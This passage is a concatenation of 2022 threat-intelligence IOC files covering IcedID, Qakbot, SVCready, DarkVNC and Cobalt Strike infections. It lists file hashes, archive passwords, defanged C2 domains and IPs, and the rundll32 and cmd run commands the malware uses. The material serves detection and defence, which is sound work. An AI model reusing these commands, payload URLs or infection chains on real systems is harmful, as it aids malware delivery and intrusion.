File description: ISO image extracted from the above zip archive 15 | 16 | - SHA256 hash: bb1fe6256cc9fc42bd74632871700af5f8663fe954a53378298b35c1f187f16b 17 | - File size: 2,082 bytes 18 | - File name: documents.lnk 19 | - File description: Windows shortcut from above ISO image 20 | - Shortcut: %windir%\System32\rundll32.exe r7kom.dll, #1 21 | 22 | - SHA256 hash: dea1ff9aa93653426473b13a0fbc088c3ad5849ec002a6a732d970cb6a01fa2d 23 | - File size: 461,824 
bytes 24 | - File name: r7kom.dll 25 | - File description: Hidden 64-bit DLL to install IcedID from above ISO image 26 | - Run method: rundll32.exe [filename], #1 27 | 28 | - SHA256 hash: b00b6da10eb383e32cb52689b5ffac199814ef986dc140c99e14cec1ee132fdc 29 | - File size: 790,939 bytes 30 | - File location: hxxp://alionavon[.]com/ 31 | - File description: gzip binary retrieved by IcedID installer to create persistent infection 32 | 33 | - SHA256 hash: 4505dd5adb62e76a93c2a7a55823b12f54777607decf84d255a9f49719a2a8aa 34 | - File size: 448,000 bytes 35 | - File location: C:\Users\[username]\AppData\Local\[username]\Weyu\ijidwm1.dll 36 | - File description: persistent 64-bit DLL for IcedID 37 | - Run method: rundll32.exe [filename],#1 --ixjowe="[path to license.dat]" 38 | 39 | - SHA256 hash: dbe9743c9c57247cb9275a23a84909dd78aca59f584df62197bde07cb87bd1ed 40 | - File size: 342,186 bytes 41 | - File location: C:\Users\[username]\AppData\Roaming\FruitAlready\license.dat 42 | - File description: data binary used to run persistent IcedID DLL 43 | 44 | INFECTION TRAFFIC: 45 | 46 | TRAFFIC FOR GZIP BINARY: 47 | 48 | - 165.232.157[.]41 port 80 - alionavon[.]com - GET / 49 | 50 | ICEDID C2 TRAFFIC: 51 | 52 | - 151.236.30[.]114 port 443 - mioshaltikaz[.]com - HTTPS traffic 53 | - 103.208.86[.]72 port 443 - cukliosario[.]com - HTTPS traffic 54 | - 104.168.132[.]251 port 443 - plomiberka[.]com - HTTPS traffic 55 | 56 | DARK VNC TRAFFIC: 57 | 58 | - 91.238.50[.]80 port 8080 - encoded/encrypted traffic 59 | 60 | COBALT STRIKE TRAFFIC (1 OF 2): 61 | 62 | - 217.79.243[.]147 port 8080 - bcnupdate[.]com:8080 - GET /lsass 63 | - 217.79.243[.]147 port 8080 - bcnupdate[.]com - GET /favicon.css?goto=true 64 | - 217.79.243[.]147 port 8080 - bcnupdate[.]com - POST /avatars 65 | 66 | COBALT STRIKE TRAFFIC (2 OF 2): 67 | 68 | - 194.37.97[.]139 port 8080 - solvesalesoft[.]com - HTTPS traffic -------------------------------------------------------------------------------- 
/2022-07-21-IOCs-for-IcedID-with-DarkVNC-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-07-21 (THURSDAY) ICEDID (BOKBOT) INFECTION WITH DARK VNC AND COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - Threat actors pushing IcedID have been active this week using thread-hijacked emails with password-protected zip archives containing ISO files. 6 | 7 | - Explorblins[.]com for the IcedID gzip binary was also reported on 2022-07-20 at https://twitter.com/pr0xylife/status/1549785810458841089 8 | 9 | ASSOCIATED MALWARE: 10 | 11 | - SHA256 hash: f0e7d595b2e3e5fd67e13a1db24506052487b1501d0b06ff50721c1902b47e8e 12 | - File size: 68,984 bytes 13 | - File name: Invoice_unpaid_July_21_document_11.zip 14 | - File description: Password-protected zip archive (distributed as email attachment) 15 | - Password: 0721 16 | 17 | - SHA256 hash: c00e2bd4b565faca702473ec323c0785fb958156109085c2e65d8e2132d5fe89 18 | - File size: 1,638,400 bytes 19 | - File name: Invoice_unpaid_July-21_document_11.iso 20 | - File description: ISO image extracted from the above zip archive 21 | 22 | CONTENTS OF THE ABOVE ISO IMAGE: 23 | 24 | - SHA256 hash: d0dcf0ef859cae89068152e08323fd7175eda951a050b36e11db29bcd931abe6 25 | - File size: 1,327 bytes 26 | - File name: documents.lnk 27 | - File description: Windows shortcut to run IcedID installer DLL 28 | - Shortcut: C:\Windows\System32\cmd.exe /c start rundll32.exe a4lomar.dll, PluginInit 29 | 30 | - SHA256 hash: fffeb0a9811bf7f77874eafcc2675c2ebc54a18c63b97b3701d2d4be2b89045f 31 | - File size: 184,320 bytes 32 | - File name: a4lomar.dll 33 | - File description: Hidden file, 64-bit DLL for IcedID installer 34 | - Run method: rundll32.exe [filename],PluginInit 35 | 36 | FILES RETRIEVED OR CREATED BY ICEDID INSTALLER: 37 | 38 | - SHA256 hash: 378dcb495c71e6517990d5962b90dc9be07ad9664b9945d3e1f0f12149722801 39 | - File size: 507,835 bytes 40 | - File location: hxxp://explorblins[.]com/ 41 | - File 
description: gzip binary retrieved by IcedID installer 42 | 43 | - SHA256 hash: 1de8b101cf9f0fabc9f086bddb662c89d92c903c5db107910b3898537d4aa8e7 44 | - File size: 342,218 bytes 45 | - File location: C:\Users\[username]\AppData\Roaming\OrdinaryNarrow\license.dat 46 | - File description: Created from gzip file, data binary used to run persistent IcedID DLL 47 | 48 | - SHA256 hash: d095c4c942974d05f58ade7d2a170333ea04a0e6da215de2492ac3bdee11f6da 49 | - File size: 164,864 bytes 50 | - File location: C:\Users\[username]\AppData\Roaming\[username]\seol64\Ebnifu.dll 51 | - File description: Created from gzip file, persistent IcedID DLL 52 | - Run method: rundll32.exe [filename],#1 --zoaq="[path to license.dat]" 53 | 54 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 55 | 56 | TRAFFIC FOR GZIP BINARY: 57 | 58 | - 165.22.201[.]70 port 80 - explorblins[.]com - GET / 59 | 60 | POST-INFECTION ICEDID C2 TRAFFIC: 61 | 62 | - 91.234.254[.]173 port 443 - weolaneocar[.]com - HTTPS traffic 63 | - 149.154.152[.]42 port 443 - brebdaalizan[.]com - HTTPS traffic 64 | - 149.154.152[.]42 port 443 - izzicarat[.]com - HTTPS traffic 65 | - 165.227.210[.]86 port 443 - cleverchaosname[.]com - HTTPS traffic 66 | - 188.93.233[.]241 port 443 - pnovajim[.]com - HTTPS traffic 67 | - 188.93.233[.]241 port 443 - mlidaxeraza[.]com - HTTPS traffic 68 | 69 | DARK VNC TRAFFIC: 70 | 71 | - 212.114.52[.]91 port 8080 - encrypted/encoded traffic 72 | 73 | COBALT STRIKE TRAFFIC: 74 | 75 | - 194.135.24[.]240 port 443 - HTTPS traffic -------------------------------------------------------------------------------- /2022-07-25-IOCs-for-IcedID-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-07-25 (MONDAY) ICEDID (BOKBOT) INFECTION WITH COBALT STRIKE 2 | 3 | NOTES: 4 | 5 | - Threat actors pushing IcedID have been active in recent weeks using thread-hijacked emails with password-protected zip archives containing ISO files. 
6 | 7 | - eventbloodd[.]com used for the IcedID gzip binary was also reported at https://twitter.com/pr0xylife/status/1551620049093509122 8 | 9 | ASSOCIATED MALWARE: 10 | 11 | - SHA256 hash: d90d9a45fe57b2c1f1c158d485c9d3fa2032c72d2fb5c999bc6962941f3e0fea 12 | - File size: 229,983 bytes 13 | - File name: Unpaid_Loan_07.25.2022.5033.zip 14 | - File description: Password-protected zip archive (distributed as email attachment) 15 | - Password: office0725 16 | 17 | - SHA256 hash: d588284b7138a600c2472a8ce099f416a702e36d5eeed549cf07e487b469990c 18 | - File size: 868,352 bytes 19 | - File name: LoanStatus_07_25_22.iso 20 | - File description: ISO image extracted from the above zip archive 21 | 22 | INSTALLER DLL FOR ICEDID FROM THE ISO IMAGE: 23 | 24 | - SHA256 hash: 5c592f6203a05ba7065f4071f61ec841976ef5d825186bb06cfdfcd02063811d 25 | - File size: 334,336 bytes 26 | - File name: XAFlSh.dat 27 | - File description: 64-bit DLL for IcedID installer stored in hidden directory in the ISO 28 | - Run method: rundll32.exe [filename],#1 29 | 30 | FILES RETRIEVED OR CREATED BY ICEDID INSTALLER: 31 | 32 | - SHA256 hash: 5c456010adf58d4252f0a4505399704b8e6b2e94667aeeb740c072993d4e8488 33 | - File size: 663,485 bytes 34 | - File location: hxxp://eventbloodd[.]com/ 35 | - File description: gzip binary retrieved by IcedID installer 36 | 37 | - SHA256 hash: 1de8b101cf9f0fabc9f086bddb662c89d92c903c5db107910b3898537d4aa8e7 38 | - File size: 342,218 bytes 39 | - File location: C:\Users\[username]\AppData\Roaming\EnsureRaven\license.dat 40 | - File description: Created from gzip file, data binary used to run persistent IcedID DLL 41 | 42 | - SHA256 hash: 5973c98cb667d24911df5f31dc29da4ec85a18cf28bc0e9dc4cacdbf383ec7c3 43 | - File size: 320,512 bytes 44 | - File location: C:\Users\[username]\AppData\Local\{F6C33E9B-3A08-C66B-6926-ADA4E992B445}\Avpobb1.dll 45 | - File description: Created from gzip file, persistent IcedID DLL 46 | - Run method: rundll32.exe [filename],#1 --be="[path to 
license.dat]" 47 | 48 | WINDOWS EXECUTABLE FOR COBALT STRIKE: 49 | 50 | - SHA256 hash: d93155adefca33960a5a125f10854dc8178e80e9bf3b86600a4c59647dd80114 51 | - File size: 2,134,016 bytes 52 | - File location: hxxp://209.222.98[.]13/download/msb.exe 53 | - File location: C:\Users\[username]\AppData\Local\Temp\Ufruat64.exe 54 | - File description: Windows executable for Cobalt Strike, retrieved from the above URL during the infection (not the IcedID gzip binary) 55 | 56 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 57 | 58 | TRAFFIC FOR GZIP BINARY: 59 | 60 | - 159.223.109[.]133 port 80 - eventbloodd[.]com - GET / 61 | 62 | POST-INFECTION ICEDID C2 TRAFFIC: 63 | 64 | - 165.227.210[.]86 port 443 - wronigrabs[.]com - HTTPS traffic 65 | - 165.227.210[.]86 port 443 - cleverchaosname[.]com - HTTPS traffic 66 | 67 | COBALT STRIKE TRAFFIC: 68 | 69 | - 209.222.98[.]13 port 80 - 209.222.98[.]13 - GET /download/msb.exe 70 | - 172.93.193[.]21 port 443 - sezijiru[.]com - HTTPS traffic 71 | -------------------------------------------------------------------------------- /2022-08-08-IOCs-for-IcedID-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-08-08 (MONDAY) - ICEDID (BOKBOT) INFECTION WITH COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> password-protected zip archive --> extracted ISO image --> files to install IcedID --> IcedID C2 --> Cobalt Strike 6 | 7 | ZIP ATTACHMENT AND EXTRACTED ISO IMAGE: 8 | 9 | - SHA256 hash: fb6d23f69d14d474ce096da4dcfea27a84c93f42c96f6dd8295d33ef2845b6c7 10 | - File size: 554,430 bytes 11 | - File name: erosstrucking-file-08.08.2022.zip 12 | - File description: password-protected zip archive 13 | - Password: office080822 14 | 15 | - SHA256 hash: d403df3fb181560d6ebf4885b538c5af86e718fecfabc73219b64924d74dd0eb 16 | - File size: 1,019,904 bytes 17 | - File name: order-130722.28554.iso 18 | - File description: ISO image extracted from the above zip archive 19 | 20 | CONTENTS OF ISO IMAGE: 21 | 22 | - SHA256 hash: 
3d279aa8f56e468a014a916362540975958b9e9172d658eb57065a8a230632fa 23 | - File size: 401,115 bytes 24 | - File name: pss10r.chm 25 | - File description: CHM (Microsoft Compiled HTML Help) file used to run IcedID installer DLL 26 | 27 | - SHA256 hash: d240bd25a0516bf1a6f6b3f080b8d649ed2b116c145dd919f65c05d20fc73131 28 | - File size: 246,272 bytes 29 | - File name: app.dll 30 | - File description: 64-bit DLL installer for IcedID, hidden file on the ISO image. 31 | - Run method: rundll32.exe [filename],#1 32 | 33 | FILES FROM THE INFECTION: 34 | 35 | - SHA256 hash: e571bb9fa8d7aa7125b52f768d1b723e440ec352621a2c5410793a20a9eb1a01 36 | - File size: 576,956 bytes 37 | - File location: hxxp://abegelkunic[.]com/ 38 | - File description: gzip binary from abegelkunic[.]com used to create license.dat and persistent IcedID DLL 39 | 40 | - SHA256 hash: 1de8b101cf9f0fabc9f086bddb662c89d92c903c5db107910b3898537d4aa8e7 41 | - File size: 342,218 bytes 42 | - File location: C:\Users\[username]\AppData\Roaming\PioneerSilly\license.dat 43 | - File description: data binary used to run persistent DLL for IcedID 44 | 45 | - SHA256 hash: 62ddbb31a8c75afe47c5f55288da2082bc2fdb34303b203cb6d46d00fcfe200a 46 | - File size: 233,984 bytes 47 | - File location: C:\Users\[username]\AppData\Local\{6CAB6B1F-1147-D823-B509-235172939D4D}\Utimmiws.dll 48 | - File description: 64-bit persistent DLL for IcedID 49 | - Run method: rundll32.exe [filename],#1 --giqo="[path to license.dat]" 50 | 51 | - SHA256 hash: af0161e32347bfcf617e1783f4a4a97154f5e2e4da55f0b8ac65e99fa746a907 52 | - File size: 1,017,856 bytes 53 | - File location: hxxp://104.238.220[.]131/download/sys.exe 54 | - File location: C:\Users\[username]\AppData\Local\Temp\Liixke.exe 55 | - File location: C:\Users\[username]\AppData\Local\Temp\sojeah.exe 56 | - File description: 64-bit EXE stager for Cobalt Strike 57 | 58 | TRAFFIC FROM THE INFECTION: 59 | 60 | INSTALLER RETRIEVES GZIP BINARY: 61 | 62 | - 178.62.238[.]75 port 80 - abegelkunic[.]com - GET 
/ HTTP/1.1 63 | 64 | ICEDID C2 TRAFFIC: 65 | 66 | - 193.109.120[.]51 port 443 - ultomductingbig[.]pro - HTTPS traffic 67 | - 146.190.25[.]131 port 443 - alohasockstaina[.]com - HTTPS traffic 68 | - 46.21.153[.]211 port 443 - wiandukachelly[.]com - HTTPS traffic 69 | 70 | COBALT STRIKE ACTIVITY: 71 | 72 | - 23.106.223[.]135 port 443 - rehazosipa[.]com - HTTPS traffic, probable Cobalt Strike 73 | - 104.238.220[.]131 port 80 - 104.238.220[.]131 - GET /download/sys.exe HTTP/1.1 74 | - 172.93.179[.]196 port 443 - wafefuvuko[.]com - HTTPS traffic -------------------------------------------------------------------------------- /2022-08-15-IOCs-for-Monster-Libra-SVCready.txt: -------------------------------------------------------------------------------- 1 | 2022-08-15 (MONDAY) - MONSTER LIBRA (TA551/SHATHAK) PUSHES SVCREADY MALWARE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> attached Word doc --> enable macros --> traffic for SVCready DLL --> SVCready C2 traffic --> possible follow-up activity 6 | 7 | NOTES: 8 | 9 | - Palo Alto Networks is tracking the TA551 (Shathak) threat actor as "Monster Libra." 10 | 11 | - Monster Libra currently pushes either IcedID (Bokbot) or SVCready malware. 12 | 13 | - Malicious Word documents from Monster Libra on 2022-08-15 use an Italian language template. 14 | 15 | - Since 2022-07-11, SVCready malware samples have not set up persistence correctly when we test these samples in our lab environments. 16 | 17 | - SVCready's initial infection and data exfiltration still occur, but rundll32.exe is copied to the location where the SVCready DLL should be for persistence. 18 | 19 | - This means the scheduled task set up by the malware uses rundll32.exe to unsuccessfully run a copy of itself, instead of running the SVCready DLL. 
20 | 21 | ASSOCIATED FILES: 22 | 23 | - SHA256 hash: e78276b7bd18e36dbd3a4b85eab8c55e9683f56b8fcf2360810859b9e801edf9 24 | - File size: 3,404,751 bytes 25 | - File name: [name removed].file.15.08.2022.doc 26 | - File description: Monster Libra Word document with macro code for SVCready 27 | 28 | - SHA256 hash: 6cbe0e1f046b13b29bfa26f8b368281d2dda7eb9b718651d5856f22cc3e02910 29 | - File size: 61,440 bytes 30 | - File location: C:\Users\[username]\AppData\Local\Temp\r19F2.tmp.exe 31 | - File description: Copy of legitimate Microsoft file rundll32.exe, not inherently malicious (do not use this hash as a block indicator; the unusual path under %TEMP% is the anomaly, not the binary) 32 | 33 | - SHA256 hash: f766d2ea0d8124120d712caad5f00ac51114076fa3354fb760ae64aae39147f1 34 | - File size: 1,332,736 bytes 35 | - File location: hxxp://45.89.54[.]120/6AFO0dsXmb/6AFO0dsXmb.php?uPUHsLURhNxs7-OfbGQ5Ga_LIgyD8S29Lg~~=Lsf4PGDFAYqkIDqE88ZTWDEJItzx79AOWg~~ 36 | - File location: C:\Users\[username]\AppData\Local\Temp\yCE1.tmp.dll 37 | - File description: Windows DLL for SVCready 38 | 39 | INFECTION TRAFFIC: 40 | 41 | - 45.89.54[.]120 port 80 - 45.89.54[.]120 - GET /6AFO0dsXmb/6AFO0dsXmb.php?uPUHsLURhNxs7-OfbGQ5Ga_LIgyD8S29Lg~~=Lsf4PGDFAYqkIDqE88ZTWDEJItzx79AOWg~~ 42 | - 34.141.91[.]129 port 80 - oilproduct[.]quest - POST /tyjigsdcdg/ruiohmc/uhgvrkr 43 | - 34.141.91[.]129 port 80 - oilproduct[.]quest - POST /tyjigsdcdg/ruiohmc 44 | - 34.141.91[.]129 port 80 - oilproduct[.]quest - POST /tyjigsdcdg/ruiohmc 45 | - 34.141.91[.]129 port 80 - oilproduct[.]quest - POST /tyjigsdcdg/ruiohmc/truheru 46 | - DNS query for biofarma[.]buzz - response: No such name 47 | - DNS query for biotech[.]cyou - response: No such name 48 | - DNS query for biotech[.]ink - response: No such name 49 | -------------------------------------------------------------------------------- /2022-09-29-IOCs-for-Obama207-Qakbot-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-09-29 (THURSDAY) - OBAMA207 QAKBOT (QBOT) INFECTION WITH COBALT STRIKE 2 | 3 | CHAIN OF 
EVENTS: 4 | 5 | - thread-hijacked email --> attached HTML file --> password-protected zip --> ISO --> files for Qakbot --> Qakbot C2 --> Cobalt Strike 6 | 7 | HEADERS FROM THREAD-HIJACKED EMAIL EXAMPLE: 8 | 9 | - Received: from linuxtr01.webimonline.com (linuxtr01.webimonline.com [194.1.192.131]) 10 | - X-Authenticated-Sender: linuxtr01.webimonline.com: marketing@polyfilmambalaj.com 11 | - From: 12 | - Date: Wed, 28 Sep 2022 20:14:32 +0300 13 | - Subject: Re: [subject line information removed] 14 | - Attachment name: REF#5689_Sep_28.html 15 | 16 | EXAMPLE OF ATTACHMENT AND EXTRACTED MALWARE: 17 | 18 | - SHA256 hash: 254fe44d8be366113010305301f9bb98c21046b819cdb7460f83177d2ea10eda 19 | - File size: 839,474 bytes 20 | - File name: REF#5689_Sep_28.html 21 | - File description: HTML file attached to thread-hijacked email 22 | 23 | - SHA256 hash: af1e56b4e4e536e950dde6309529978d54b831c4dbed355d66acdd75c05e3b22 24 | - File size: 410,653 bytes 25 | - File name: attachment.zip 26 | - File description: password-protected zip archive presented by the above HTML file 27 | - Password: abc333 28 | 29 | - SHA256 hash: 74eadf557feb76f995acc9c3371712044c73e21323904bb41ba1a72378928d32 30 | - File size: 1,040,384 bytes 31 | - File name: REF#5694.iso 32 | - File description: ISO image extracted from the above zip archive 33 | 34 | CONTENTS OF ISO IMAGE: 35 | 36 | - SHA256 hash: 973a4e4501ebe54944cedce75462b30f90e5d06b60ced203ae9e7db66c1256e2 37 | - File size: 1,245 bytes 38 | - File name: REF.lnk 39 | - File description: Windows shortcut on ISO image 40 | - Shortcut: eloquentGlummer.js 41 | 42 | - SHA256 hash: fcdb889021a8ad5cc85f75de4247c052289dead4e09817f90e7f1ff516ea74be 43 | - File size: 154 bytes 44 | - File name and location on ISO image: gaffes\eloquentGlummer.js 45 | - File description: JS file run by the above Windows shortcut 46 | 47 | - SHA256 hash: cc4eea861c9c3a4ea4e9bd0e7cd6e19650f5d80d993536f41b8bd0735a7b56e4 48 | - File size: 142 bytes 49 | - File name and location on 
ISO image: gaffes\acknowledgeablyPartner.cmd 50 | - File description: CMD batch script run by the above JS file 51 | 52 | - SHA256 hash: d4adf98011c988085273146bac1d815f69adfd7c3722d8e2103c53c86b909be7 53 | - File size: 712,192 bytes 54 | - File name and location on ISO image: gaffes\wheelwright.db 55 | - File description: Qakbot DLL run by above CMD batch script 56 | - Run method: regsvr32.exe [filename] 57 | 58 | WORKING QAKBOT C2 TRAFFIC FROM AN INFECTED WINDOWS HOST: 59 | 60 | - 186.90.144[.]235 port 2222 - HTTPS traffic using TLS v1.3 61 | - 186.81.122[.]168 port 443 - HTTPS traffic using TLS v1.3 62 | - 85.86.242[.]245 port 443 - HTTPS traffic using TLS v1.3 63 | - 193.3.19[.]137 port 443 - HTTPS traffic using TLS v1.3 64 | 65 | COBALT STRIKE TRAFFIC SEEN DURING THIS INFECTION: 66 | 67 | - 194.165.16[.]64 port 80 - onefile[.]icu - GET /prepare/add.mp4a HTTP/1.1 68 | - 194.165.16[.]64 port 80 - onefile[.]icu - GET /risk.ico HTTP/1.1 69 | - 194.165.16[.]64 port 80 - onefile[.]icu - POST /target HTTP/1.1 (text/plain) -------------------------------------------------------------------------------- /2022-10-10-IOCs-for-Cobalt-Strike-from-Qakbot-infection.txt: -------------------------------------------------------------------------------- 1 | 2022-10-10 (MONDAY) - COBALT STRIKE FROM QAKBOT INFECTION 2 | 3 | CHAIN OF EVENTS: 4 | 5 | - link from email --> password-protected zip --> ISO --> Windows shortcut runs Qakbot DLL --> Qakbot C2 --> Cobalt Strike 6 | 7 | NOTES: 8 | 9 | - No binary for Cobalt Strike was saved to disk on the infected Windows host. 
10 | 11 | - The URL used to kick off this infection was reported at URLhaus: https://urlhaus.abuse.ch/url/2353588/ 12 | 13 | DOWNLOADED ZIP ARCHIVE AND EXTRACTED ISO IMAGE: 14 | 15 | - SHA256 hash: e94d8d2ac206bc3fb9e020ee23a7e597ef280d14330034ed5b27b5b203f24de4 16 | - File size: 648,391 bytes 17 | - File name: N2752610163.zip 18 | - File location: hxxp://webexpertize[.]com/ssv/N2752610163.zip 19 | - File description: Password-protected zip archive returned from link in email 20 | - Password: X353 21 | 22 | - SHA256 hash: f07c5e4debb8c334afc75875ceacf5d4af627ba39b4eb65c56d70373d8ff0951 23 | - File size: 1,525,760 bytes 24 | - File name: New_documents#6904.iso 25 | - File description: ISO image extracted from the above zip archive 26 | 27 | CONTENTS OF THE EXTRACTED ISO IMAGE: 28 | 29 | - SHA256 hash: 2929d8090f813cffafab014a9915184def203147665e33ac0bc124c21aa22c30 30 | - File size: 1,185 bytes 31 | - File name: New_documents.lnk 32 | - File description: Windows shortcut 33 | 34 | - SHA256 hash: ed9240124e2a1628cd04d2e718c3d5eff496bca505b8df66e90d319f142667d8 35 | - File size: 271 bytes 36 | - File location: 3550\2646.cmd 37 | - File description: Batch file run by the above Windows shortcut 38 | 39 | - SHA256 hash: 80556052a05684ca0f8729c182aa3a48abb040fe5e358b6f67833b52dbd1c172 40 | - File size: 1,465,856 bytes 41 | - File location: 3550\unaccidental.dat 42 | - File description: DLL file for Qakbot 43 | - Run method: regsvr32.exe [filename] 44 | 45 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 46 | 47 | TRAFFIC FROM LINK IN THE EMAIL TO DOWNLOAD PASSWORD-PROTECTED ZIP ARCHIVE: 48 | 49 | - 162.241.85[.]74 port 80 - webexpertize[.]com - GET /ssv/ftugauit 50 | - 162.241.85[.]74 port 80 - webexpertize[.]com - GET /ssv/N2752610163.zip 51 | - Note: URL in the email was originally reported as HTTPS at https://urlhaus.abuse.ch/url/2353588/ 52 | 53 | QAKBOT POST-INFECTION TRAFFIC: 54 | 55 | - 190.73.190[.]235 port 443 - attempted TCP connections 56 | - 42.189.2[.]151 port 80 - 
attempted TCP connections 57 | - 105.99.214[.]100 port 443 - attempted TCP connections 58 | 59 | - 197.204.78[.]120 port 443 - HTTPS traffic (TLSv1.2) 60 | - 134.35.4[.]128 port 443 - HTTPS traffic (TLSv1.2) 61 | 62 | COBALT STRIKE TRAFFIC: 63 | 64 | - 64.44.102[.]244 port 443 - pigahinilu[.]com - HTTPS traffic (TLSv1.2) 65 | 66 | CERTIFICATE ISSUER DATA FOR QAKBOT HTTPS SERVER AT 197.204.78[.]120: 67 | 68 | - id-at-countryName=AT 69 | - id-at-stateOrProvinceName=JW 70 | - id-at-localityName=Wcqiyf 71 | - id-at-organizationName=Oaobt Tana Jtr Inc. 72 | - id-at-commonName=medg.org 73 | 74 | CERTIFICATE ISSUER DATA FOR QAKBOT HTTPS SERVER AT 134.35.4[.]128: 75 | 76 | - id-at-countryName=GB 77 | - id-at-stateOrProvinceName=HS 78 | - id-at-localityName=Jifieo Eetcgeqes 79 | - id-at-organizationName=Wijoi Ang Gkmvew Inc. 80 | - id-at-commonName=ucooezonym.com 81 | 82 | CERTIFICATE ISSUER DATA FOR COBALT STRIKE HTTPS SERVER AT 64.44.102[.]244 (publicly trusted Sectigo DV certificate, so the issuer fields alone are not a usable indicator; pivot on the IP and domain instead): 83 | 84 | - id-at-countryName=GB 85 | - id-at-stateOrProvinceName=Greater Manchester 86 | - id-at-localityName=Salford 87 | - id-at-organizationName=Sectigo Limited 88 | - id-at-commonName=Sectigo RSA Domain Validation Secure Server CA 89 | -------------------------------------------------------------------------------- /2022-10-31-IOCs-for-IcedID-with-DarkVNC-and-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-10-31 (MONDAY) - ICEDID (BOKBOT) INFECTION WITH DARK VNC AND COBALT STRIKE 2 | 3 | INFECTION CHAIN: 4 | 5 | - email --> HTML attachment --> password-protected zip --> ISO --> Windows shortcut runs DLL --> IcedID C2 --> DarkVNC & Cobalt Strike 6 | 7 | NOTES: 8 | 9 | - This infection was generated from an HTML file submitted to Malware Bazaar by @k3dg3 at: 10 | https://bazaar.abuse.ch/sample/eca3ef27738569bbd0d4b577da6848068769e8164d7b3276c4867f3343a8c948/ 11 | 12 | ATTACHED HTML FILE: 13 | 14 | - SHA256 hash: 
eca3ef27738569bbd0d4b577da6848068769e8164d7b3276c4867f3343a8c948 15 | - File size: 251,507 bytes 16 | - File name: Unpaid_3945_Oct31.html 17 | - File description: HTML file attached to email distributing IcedID 18 | 19 | DOWNLOADED ZIP AND EXTRACTED ISO IMAGE: 20 | 21 | - SHA256 hash: d04e63e88ffefddb66b73308d1c1a8e2349d998b86eb1191b41732666cbf4cee 22 | - File size: 90,195 bytes 23 | - File name: Invoice.zip 24 | - File description: Password-protected zip archive presented by the above HTML file 25 | - Password: w1031 26 | 27 | - SHA256 hash: 043a13615bdfe7a7011f09b826a4a5f5597f8b8e4b9498c0807e67db9ad1ed88 28 | - File size: 1,703,936 bytes 29 | - File name: document_3_Oct31.iso 30 | - File description: ISO image containing files to install IcedID 31 | 32 | CONTENTS OF ISO IMAGE: 33 | 34 | - SHA256 hash: d2d2bda70687d4c070e06c44008880d1f52859f0e3bca67853978221799d6cbc 35 | - File size: 1,657 bytes 36 | - File name/location in the ISO: Data.lnk 37 | - File description: Windows shortcut that runs the below batch file 38 | 39 | - SHA256 hash: 0d64fb2cd5cce8f8e8a9ac1c311d1867ec1dadb7622a3bc5e930d1c7063ae62e 40 | - File size: 1,482 bytes 41 | - File name/location in the ISO: ribfaymasnot\chickenrelaxed.bat 42 | - File description: batch file that runs the below IcedID installer DLL 43 | 44 | - SHA256 hash: 2ff819c01e03fa26413bf607711df3e5a7f4efdffe55f57c3c637d6c7b408bec 45 | - File size: 206,848 bytes 46 | - File name/location in the ISO: ribfaymasnot\shortening.dat 47 | - File description: IcedID installer 64-bit DLL 48 | - Run method: rundll32.exe [filename],#1 49 | 50 | FILES FROM AN INFECTED WINDOWS HOST: 51 | 52 | - SHA256 hash: 0b65cb4b59b61689155c6599c5a8c256aac980dc602ac1daeb9bf273489c0e4f 53 | - File size: 562,907 bytes 54 | - File description: gzip binary retrieved from vgiragdoffy[.]com by the IcedID installer DLL 55 | 56 | - SHA256 hash: a0f5450deb333336e9d157e94647381036e7a9107ec842b24a9624d59cbfd59a 57 | - File size: 364,522 bytes 58 | - File location: 
C:\Users\[username]\AppData\Roaming\DifferSpeak\license.dat 59 | - File description: data binary used to run persistent IcedID DLL below 60 | 61 | - SHA256 hash: ff3be9c287431fec953681fd50c96632cefaa164a00ab84dcecd1a817537777e 62 | - File size: 197,632 bytes 63 | - File location: C:\Users\[username]\AppData\Roaming\[username]\Odwikp.dll 64 | - File description: 64-bit DLL for IcedID persistent on infected Windows host 65 | - Run method: rundll32.exe [filename],#1 --lahu="[path to license.dat]" 66 | 67 | TRAFFIC FROM AN INFECTED WINDOWS HOST: 68 | 69 | INSTALLER DLL RETRIEVES GZIP BINARY: 70 | 71 | - 67.205.184[.]237 port 80 - vgiragdoffy[.]com - GET / 72 | 73 | POST-INFECTION ICEDID C2 TRAFFIC: 74 | 75 | - 137.184.208[.]116 port 443 - ringashopsu[.]com - HTTPS traffic 76 | - 138.68.255[.]102 port 443 - sainforgromset[.]com - HTTPS traffic 77 | - 94.140.114[.]103 port 443 - yeloypod[.]hair - HTTPS traffic 78 | - 66.63.168[.]75 port 443 - airsaintol[.]beauty - HTTPS traffic 79 | 80 | DARK VNC TRAFFIC: 81 | 82 | - 137.74.104[.]108 port 8080 - encrypted traffic 83 | 84 | COBALT STRIKE TRAFFIC: 85 | 86 | - 198.44.140[.]67 port 8008 - clouditsoft[.]com - HTTPS traffic 87 | -------------------------------------------------------------------------------- /2022-11-28-IOCs-for-BB08-Qakbot-with-Cobalt-Strike.txt: -------------------------------------------------------------------------------- 1 | 2022-11-28 (MONDAY) - BB08 DISTRIBUTION QAKBOT (QBOT) WITH COBALT STRIKE 2 | 3 | REFERENCES FOR INITIAL QAKBOT MALWARE: 4 | 5 | - https://twitter.com/pr0xylife/status/1597224425753309186 6 | - https://bazaar.abuse.ch/sample/7d1d7d196b3932e4e3e7cc1159f0e3ebab252f6a5f1ed6000f78d2133052a0de/ 7 | 8 | INFECTION CHAIN: 9 | 10 | - email --> link --> password-protected zip --> extracted iso --> .js --> .ps1 creates/runs Qakbot DLL from Base64 text --> Qakbot C2 --> Cobalt Strike 11 | 12 | ZIP ARCHIVE AND EXTRACTED ISO IMAGE: 13 | 14 | - SHA256 hash: 
